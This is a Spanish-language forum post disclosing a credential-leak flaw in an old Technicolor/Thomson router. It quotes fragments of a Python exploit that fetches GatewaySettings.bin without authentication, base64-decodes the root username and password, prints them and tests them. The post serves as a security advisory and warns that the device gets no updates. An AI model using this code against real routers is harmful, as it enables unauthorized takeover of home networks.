El libre pensamiento para un internet libre
No estas registrado.
Esto no es una lavadora: es un router.
Un router un "poco" anticuado con un diseño muy "Thomson" (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces?
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el "exploit" en este tema de packet storm :
Lo que ocurre es que los credenciales están
en un fichero accesible sin conocer la contraseña root
cifrados en base 64 y es una función de hash reversible
1. Se pasa por CatewaySettings.bin : vemos la variable "bifi" definida aquí
bifi = 'GatewaySettings.bin'
Par ser empleada en la petición
req = urllib2.Request('%s/%s'%(router,bifi))
2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle "for"
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
Y luego se pillan los datos con el "bucle if"
if dec.find(':') != -1:
user,passwd = dec.split(':')
print '(+)- User: %s%s%s'%(G_C,user,D_C)
print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)
No hay remedio y no habrán actualizaciones para este router.
No es aconsejable usarlo como router para su red domestica.
Los créditos para este full disclosure van a Glaysson dos Santos
Fuente:
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
7 | 5798 | Ayer 23:52:00 por scriptkiddie | |
Pegado: |
413 | 40412 | 20-01-2021 19:30:05 por [email protected] |
5 | 399 | 20-01-2021 01:19:58 por troh | |
Buscando un gestionar de contrasena por Koala
|
2 | 133 | 19-01-2021 17:45:22 por Koala |
Pegado: |
13 | 4152 | 14-01-2021 18:37:07 por Koala |
Ultimo usuario registrado: noelj20
Usuarios registrados conectados: 0
Invitados conectados: 6
Número total de usuarios registrados: 2,090
Número total de temas: 1,492
Número total de mensajes: 14,584
Atom tema feed - Impulsado por FluxBB